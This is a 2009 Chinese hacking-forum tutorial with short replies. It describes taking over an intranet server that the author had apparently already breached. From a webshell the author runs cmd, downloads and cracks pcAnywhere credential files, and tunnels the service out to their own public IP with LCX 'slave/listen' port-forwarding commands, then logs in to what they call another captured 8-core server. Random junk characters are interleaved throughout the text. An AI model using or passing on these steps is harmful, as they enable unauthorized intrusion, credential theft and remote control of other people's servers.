Board logo

标题: [原创文章] pcanywhere之内网提权 [打印本页]

作者: huar    时间: 2009-7-5 21:35     标题: pcanywhere之内网提权

很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。; @- ]1 D. j8 h/ P. W

8 s9 `# J  g& h/ X5 O提权方法:pcanywhere+LCX$ C; q3 J* R3 a9 B4 m- |

" u8 J: R; b" M+ `  f( q获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。4 Y9 I9 g  G# _$ K; I
0 i0 P0 n6 @7 ~& G6 F: l
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
5 G0 h( I3 ~# w. X" I9 G+ K+ V3 U" n' u
[attach]1548[/attach]
6 t! ~8 G  g4 h$ w查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。% f. |$ |/ H) a& P: F
/ t6 H2 ]& `8 S* l7 i( ?
[attach]1549[/attach]6 t: _1 _( z; |7 v: [0 c
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
0 u3 W% h1 O* X6 K2 ]. {4 H0 n# k! U- b
[attach]1550[/attach]
6 k! Q; \# _. y, X0 {9 w9 ~$ }' e9 M% q! Q- e
[attach]1551[/attach]
# z. Y: l  e! [3 P由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
& W( f% X  Q5 @7 D* [, h* j  f6 w% U# C8 }
[attach]1552[/attach]9 X% t% N; M6 q5 q  [& R
LCX的用法再简单说下:
" Z6 Y. I) S0 Q' q( Q3 F" }
! A' Y( K" I) M/ J- W: ]' ?服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口). q3 L9 q2 q4 H. L4 g$ x
% u4 o6 a2 a4 h* x6 l7 [! P
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)- z& \9 g$ C+ v7 D7 a0 n

, t" O% F1 w* y  b7 c0 z9 J由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
0 P5 b8 H' [" A+ ~5 [! E+ U顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``  x1 g( b1 ~" y: S- E4 {0 k
0 y& r5 Q& q" L/ T: d' U
[attach]1553[/attach]* ?# z. u. [3 c, x# O
& L/ V6 S9 v" v" r  c
[attach]1554[/attach]
& w3 {6 }  u5 G呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。) p  a! w! z! G1 G+ _" \: @

; r8 t% u& S2 P2 `4 k; ^[attach]1555[/attach]* O0 [8 P4 y' y/ V
) v) c9 c( T  B4 z
[attach]1556[/attach]) f3 H- d% x3 k  [# K. Y
我们本地连接试试,输入我们刚破解的账号密码
# y% H* |; y; E
0 s! t# u# K, @/ s# Y, ^2 r- O[attach]1557[/attach]! Q, R2 s6 q1 z; B9 }
呵呵``连接成功,服务器不错,又一个8核^︵^
6 `! K5 P* z0 U; R  W5 k0 A5 s$ n7 F, Z# P7 k! S, @
[attach]1558[/attach]; d& ?# S( ~3 j, R) K& k) _: O

  G6 ?+ \3 G1 a- n8 T5 ~[attach]1559[/attach]
作者: 柔肠寸断    时间: 2009-7-5 21:37

不错不错。。。你的貌似一直都是内网服务器哈
作者: huar    时间: 2009-7-5 21:41

哎。。。。运气不佳```老碰见内网的。。。。
作者: gassiori    时间: 2009-7-6 09:50

八核的哟
作者: 柔肠寸断    时间: 2009-12-15 15:36

顶起。。。。。。。。。
作者: killadmin    时间: 2010-1-21 20:01

但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2